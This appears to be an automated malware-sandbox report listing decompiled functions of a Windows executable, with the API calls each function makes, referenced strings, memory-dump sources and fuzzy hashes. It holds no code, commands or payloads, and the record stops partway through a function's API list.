Instruction ID: 30fe9aef8bba7dc4809cf2f8f6ee5958d5d3e7afa540d71a4f6d41a341d46b65
Opcode Fuzzy Hash: 340314b13e1d177f3c13982e7e8eb0769b10e3d260bda956ed1a6db465827155
Instruction Fuzzy Hash: 08B116716483039FC710EF28C894A6EB7E5BFA5720F50491DF496C7291E778E984CB52

Function 007A911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

DragQueryPoint.SHELL32(?,?), ref: 007A9147

Part of subcall function 007A7674: ClientToScreen.USER32(?,?), ref: 007A769A
Part of subcall function 007A7674: GetWindowRect.USER32(?,?), ref: 007A7710
Part of subcall function 007A7674: PtInRect.USER32(?,?,007A8B89), ref: 007A7720

SendMessageW.USER32(?,000000B0,?,?), ref: 007A91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007A91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007A91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007A9225
SendMessageW.USER32(?,000000B0,?,?), ref: 007A923E
SendMessageW.USER32(?,000000B1,?,?), ref: 007A9255
SendMessageW.USER32(?,000000B1,?,?), ref: 007A9277
DragFinish.SHELL32(?), ref: 007A927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007A9371

Strings

@GUI_DRAGID, xrefs: 007A92E9
@GUI_DRAGFILE, xrefs: 007A9320
p#~, xrefs: 007A92BB
@GUI_DROPID, xrefs: 007A929E

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#~
API String ID: 221274066-3354685542
Opcode ID: 59ec96261f62b25a2b9ea8b11ebd37c5143ef63d126919c1ab099f65e285b132
Instruction ID: 25f49c682e3a98667729743ea3b7071271ef2e46cf2e57e6bcefaeb058758de6
Opcode Fuzzy Hash: 59ec96261f62b25a2b9ea8b11ebd37c5143ef63d126919c1ab099f65e285b132
Instruction Fuzzy Hash: D3617C71108301AFC701DF64DC89DAFBBE8EFC9750F404A1EF691921A1DB389A49CB96

Function 0079AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0079B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079B1D4
_wcslen.LIBCMT ref: 0079B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079B236
_wcslen.LIBCMT ref: 0079B332

Part of subcall function 007805A7: GetStdHandle.KERNEL32(000000F6), ref: 007805C6

_wcslen.LIBCMT ref: 0079B34B
_wcslen.LIBCMT ref: 0079B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079B3B6
GetLastError.KERNEL32(00000000), ref: 0079B407
CloseHandle.KERNEL32(?), ref: 0079B439
CloseHandle.KERNEL32(00000000), ref: 0079B44A
CloseHandle.KERNEL32(00000000), ref: 0079B45C
CloseHandle.KERNEL32(00000000), ref: 0079B46E
CloseHandle.KERNEL32(?), ref: 0079B4E3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 408f84c72036d128f01e8315527fcdbe5c9db951cd9ec53e402b8ed5761c63a4
Instruction ID: 2dd6ef691732084a6b7ab70e7b8270db7d3fba16c75bb02701d5cf3d6a20750d
Opcode Fuzzy Hash: 408f84c72036d128f01e8315527fcdbe5c9db951cd9ec53e402b8ed5761c63a4
Instruction Fuzzy Hash: C7F1AC31604340DFCB15EF28E995B6EBBE1AF85310F14855DF8898B2A2DB39EC44CB52

Function 0071326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(007E1990), ref: 00752F8D
GetMenuItemCount.USER32(007E1990), ref: 0075303D
GetCursorPos.USER32(?), ref: 00753081
SetForegroundWindow.USER32(00000000), ref: 0075308A
TrackPopupMenuEx.USER32(007E1990,00000000,?,00000000,00000000,00000000), ref: 0075309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007530A9

Strings

0, xrefs: 0071327D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 2ec3d10f91c9ac80e5cd65079ed388243793ffd25a938f8ebc4e1aea327711df
Instruction ID: 152908fb2f9e8ea74dc9dcf880c94cddecf0e4a42a6b4ca7e8e6825e1f6863aa
Opcode Fuzzy Hash: 2ec3d10f91c9ac80e5cd65079ed388243793ffd25a938f8ebc4e1aea327711df
Instruction Fuzzy Hash: FA712970644205FEEB219F28DC49FEABF65FF06364F204206F9196A1E1C7F9A954C790

Function 007A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 007A6DEB

Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007A6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007A6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A6E94
DestroyWindow.USER32(?), ref: 007A6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00710000,00000000), ref: 007A6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A6EFD
GetDesktopWindow.USER32 ref: 007A6F16
GetWindowRect.USER32(00000000), ref: 007A6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007A6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007A6F4D

Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952

Strings

0, xrefs: 007A6D98
tooltips_class32, xrefs: 007A6E58, 007A6EDD

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 0d4cec7dea2598c09cce24782bf768c9cd7b1931cc61e8fa2e207144d0a7f859
Instruction ID: 61393156d6ad619e0f50f5898277428101b89250b538c1c64a3a092d0b6f8f97
Opcode Fuzzy Hash: 0d4cec7dea2598c09cce24782bf768c9cd7b1931cc61e8fa2e207144d0a7f859
Instruction Fuzzy Hash: 43717870144284AFDB21CF18DC48EAABBF9FBCA304F48455EF999872A1C778E905CB15

Function 0078C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0078C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0078C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0078C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0078C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0078C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0078C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0078C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0078C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0078C5F0
InternetCloseHandle.WININET(00000000), ref: 0078C5FB

Strings

, xrefs: 0078C575

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 56a2a935119f150ffdd9e2b23bebb6ad14a637bc9e0ce92b2c93dd8199a7d923
Instruction ID: fc7d3826c9b263824a7f1fea31687b5a0b84e9babcc1f2cb0fc8a34edb93df34
Opcode Fuzzy Hash: 56a2a935119f150ffdd9e2b23bebb6ad14a637bc9e0ce92b2c93dd8199a7d923
Instruction Fuzzy Hash: 75516EB1540204BFEB22AF60C948ABB7BFCFF49754F108419F94596250DB38E954DB70

Function 007A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 007A8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85BA
GlobalLock.KERNEL32(00000000), ref: 007A85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85D7
GlobalUnlock.KERNEL32(00000000), ref: 007A85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,007AFC38,?), ref: 007A8611
GlobalFree.KERNEL32(00000000), ref: 007A8621
GetObjectW.GDI32(?,00000018,?), ref: 007A8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 007A8671
DeleteObject.GDI32(?), ref: 007A8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007A86AF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 201d3b6513a259901d43bffa495593dd8f07e07b96a4666cbd01ff112ad35f38
Instruction ID: 15e5fc193d8c7b011943669548eb765e01080317df1699e9f726980c15e7f308
Opcode Fuzzy Hash: 201d3b6513a259901d43bffa495593dd8f07e07b96a4666cbd01ff112ad35f38
Instruction Fuzzy Hash: 5C41FA75600208FFDB129FA5DC48EAA7BB8FF8A711F148158F905E7260DB389901CB65

Function 007814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00781502
VariantCopy.OLEAUT32(?,?), ref: 0078150B
VariantClear.OLEAUT32(?), ref: 00781517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007815FB
VarR8FromDec.OLEAUT32(?,?), ref: 00781657
VariantInit.OLEAUT32(?), ref: 00781708
SysFreeString.OLEAUT32(?), ref: 0078178C
VariantClear.OLEAUT32(?), ref: 007817D8
VariantClear.OLEAUT32(?), ref: 007817E7
VariantInit.OLEAUT32(00000000), ref: 00781823

Strings

Default, xrefs: 007816AF
%4d%02d%02d%02d%02d%02d, xrefs: 00781625

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 10c1d8e8b2d4e92ca52d0a20c0f805da855f0c73bafb8fd80aea4650f5957a79
Instruction ID: 2d6a94b6b96e87ba7ea690f0c652f1a8e30db7b415073ed811c9e96d6b61bfdc
Opcode Fuzzy Hash: 10c1d8e8b2d4e92ca52d0a20c0f805da855f0c73bafb8fd80aea4650f5957a79
Instruction Fuzzy Hash: AFD12572A40115EBDB00BF65E889BBDB7B9BF46700F50805AF446AB180DB3CED52DB61

Function 0079B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0079B80A
RegCloseKey.ADVAPI32(?), ref: 0079B87E
RegCloseKey.ADVAPI32(?), ref: 0079B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0079B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0079B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0079B922
FreeLibrary.KERNEL32(00000000), ref: 0079B983
RegCloseKey.ADVAPI32(00000000), ref: 0079B994

Strings

RegDeleteKeyExW, xrefs: 0079B8FE
advapi32.dll, xrefs: 0079B8ED

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 73162eff913e4a64f5db5b50fc16c062f58975c402447d9d4f1168122700280f
Instruction ID: a4e8b71d5d10f2c5c6317a77f5065edf400ed363a5db4885f46fb191f5311599
Opcode Fuzzy Hash: 73162eff913e4a64f5db5b50fc16c062f58975c402447d9d4f1168122700280f
Instruction Fuzzy Hash: 4BC19F30204201EFDB14DF18E599F2ABBE5BF84314F14855CF55A4B2A2CB79EC86CB91

Function 0079255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007925E8
CreateCompatibleDC.GDI32(?), ref: 007925F4
SelectObject.GDI32(00000000,?), ref: 00792601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0079266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007926D0
SelectObject.GDI32(?,?), ref: 007926D8
DeleteObject.GDI32(?), ref: 007926E1
DeleteDC.GDI32(?), ref: 007926E8
ReleaseDC.USER32(00000000,?), ref: 007926F3

Strings

(, xrefs: 0079268D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: eba35e418637472dfbba272caa52e9c9c171363b8aab7c836807c833fe297013
Instruction ID: 7acb154ea546c7639b4f5687e10ca0bf6cbf77bf1492f15ca269d03c28f27ebf
Opcode Fuzzy Hash: eba35e418637472dfbba272caa52e9c9c171363b8aab7c836807c833fe297013
Instruction Fuzzy Hash: 296113B5E00219EFCF05DFA4D884AAEBBF5FF48310F208429E955A7251E734A941CF94

Function 0074DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0074DAA1

Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D659
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D66B
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D67D
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D68F
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6A1
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6B3
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6C5
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6D7
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6E9
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6FB
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D70D
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D71F
Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D731

_free.LIBCMT ref: 0074DA96

Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0

_free.LIBCMT ref: 0074DAB8
_free.LIBCMT ref: 0074DACD
_free.LIBCMT ref: 0074DAD8
_free.LIBCMT ref: 0074DAFA
_free.LIBCMT ref: 0074DB0D
_free.LIBCMT ref: 0074DB1B
_free.LIBCMT ref: 0074DB26
_free.LIBCMT ref: 0074DB5E
_free.LIBCMT ref: 0074DB65
_free.LIBCMT ref: 0074DB82
_free.LIBCMT ref: 0074DB9A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2236a7c2cc877088aaad6c78fe7d9836e7d9c2afcd62775bda157e989cb610d3
Instruction ID: d625ca373adeb312f2c68f3a5941913f580ea98a507d686cfac3a1406c6ec626
Opcode Fuzzy Hash: 2236a7c2cc877088aaad6c78fe7d9836e7d9c2afcd62775bda157e989cb610d3
Instruction Fuzzy Hash: 2F315C71604205DFEB32AA39E849B5677E9FF00310F55442AF498E72A2DB39BC51CB20

Function 0077365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0077369C
_wcslen.LIBCMT ref: 007736A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00773797
GetClassNameW.USER32(?,?,00000400), ref: 0077380C
GetDlgCtrlID.USER32(?), ref: 0077385D
GetWindowRect.USER32(?,?), ref: 00773882
GetParent.USER32(?), ref: 007738A0
ScreenToClient.USER32(00000000), ref: 007738A7
GetClassNameW.USER32(?,?,00000100), ref: 00773921
GetWindowTextW.USER32(?,?,00000400), ref: 0077395D

Strings

%s%u, xrefs: 00773734

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: c510a8ba7c6ecd7169054301700e64104ac6f4c0a463cc0d21f7241f61b0dc81
Instruction ID: 0a157ad61caa41298e01fbbbd8396955b7cfbd73a6417f340410c011b5642f27
Opcode Fuzzy Hash: c510a8ba7c6ecd7169054301700e64104ac6f4c0a463cc0d21f7241f61b0dc81
Instruction Fuzzy Hash: 9B91C671204606EFDB19DF24C885BAAF7A8FF44394F00C519FA9DC2190DB38EA55DBA1

Function 00774954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00774994
GetWindowTextW.USER32(?,?,00000400), ref: 007749DA
_wcslen.LIBCMT ref: 007749EB
CharUpperBuffW.USER32(?,00000000), ref: 007749F7
_wcsstr.LIBVCRUNTIME ref: 00774A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00774A64
GetWindowTextW.USER32(?,?,00000400), ref: 00774A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00774AE6
GetClassNameW.USER32(?,?,00000400), ref: 00774B20
GetWindowRect.USER32(?,?), ref: 00774B8B

Strings

ThumbnailClass, xrefs: 00774A6F, 00774AF1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: f96af45dca0150f5a0e836ce547d0e1927cc89e45ffb26b33de5fcf54cad1f40
Instruction ID: b80187898ff3fdcd98f2d282ea8ba80aa5dfec2051367c60f56f4bc6fe25d952
Opcode Fuzzy Hash: f96af45dca0150f5a0e836ce547d0e1927cc89e45ffb26b33de5fcf54cad1f40
Instruction Fuzzy Hash: 8391AC71104205AFDF05DF14C985BAAB7E8FF84394F04C46AFD899A0A6DB38ED45CBA1

Function 007A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007A8D5A
GetFocus.USER32 ref: 007A8D6A
GetDlgCtrlID.USER32(00000000), ref: 007A8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 007A8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007A8ECF
